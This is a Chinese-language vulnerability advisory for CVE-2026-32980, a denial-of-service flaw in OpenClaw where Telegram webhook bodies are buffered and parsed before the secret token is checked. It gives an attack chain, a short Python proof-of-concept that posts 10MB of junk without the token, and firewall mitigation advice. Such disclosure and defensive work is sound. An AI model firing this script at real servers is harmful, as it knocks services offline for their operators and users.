CVE-2026-32980 CVSS 7.5 高危

CVE-2026-32980 OpenClaw资源耗尽漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32980

漏洞类型

资源耗尽

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.13之前的版本存在安全漏洞，该软件在验证x-telegram-bot-api-secret-token请求头之前，会先读取并缓冲Telegram webhook请求体。未经身份验证的攻击者可利用此缺陷，向webhook端点发送特制的POST请求，迫使服务器在身份验证验证发生前即消耗内存、套接字时间和JSON解析资源，从而导致服务器资源耗尽。

技术细节

该漏洞的根本原因在于OpenClaw处理Webhook请求时的逻辑顺序不当。安全的设计应当是在处理大量数据之前先进行身份验证，以防止未授权用户消耗系统资源。然而，受影响的OpenClaw版本在接收到POST请求时，首先将整个请求体读入内存缓冲区并进行JSON解析，随后才检查x-telegram-bot-api-secret-token头部的有效性。攻击者无需拥有合法密钥，只需发送包含大量垃圾数据的POST请求即可触发该漏洞。服务器会为此分配内存并占用CPU进行解析，攻击者通过高频或大流量请求可迅速耗尽服务器的可用内存和连接池，导致服务不可用（DoS）。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标服务器正在使用OpenClaw，并定位其Telegram Webhook接收端点。

STEP 2

2. 构造攻击载荷

攻击者编写脚本，生成包含大量随机数据（如10MB的JSON或文本）的HTTP POST请求。

STEP 3

3. 发起攻击

攻击者向Webhook端点发送构造的POST请求，故意不包含或包含错误的x-telegram-bot-api-secret-token请求头。

STEP 4

4. 资源耗尽

服务器在未验证身份前接收并缓冲了整个请求体，消耗大量内存和CPU，最终导致服务拒绝响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_openclaw(url):
    # Target webhook endpoint
    target = f"{url}/webhook"
    
    # Craft a large payload to exhaust memory
    # Sending 10MB of 'A' characters
    large_data = "A" * (10 * 1024 * 1024)
    
    # Headers without the secret token to bypass early auth checks
    # or simply to force the server to buffer before checking auth
    headers = {
        "Content-Type": "application/json"
    }
    
    try:
        print(f"[+] Sending large payload to {target}...")
        # The server will buffer this large data before checking the token
        response = requests.post(target, data=large_data, headers=headers, timeout=10)
        print(f"[+] Response status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    target_url = "http://127.0.0.1:8000"
    exploit_openclaw(target_url)

影响范围

OpenClaw < 2026.3.13

防御指南

临时缓解措施

建议在无法立即升级补丁的情况下，通过网络边界设备（如防火墙或WAF）配置规则，限制发往Webhook端点的HTTP请求包大小及并发连接数，从而减轻资源耗尽的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表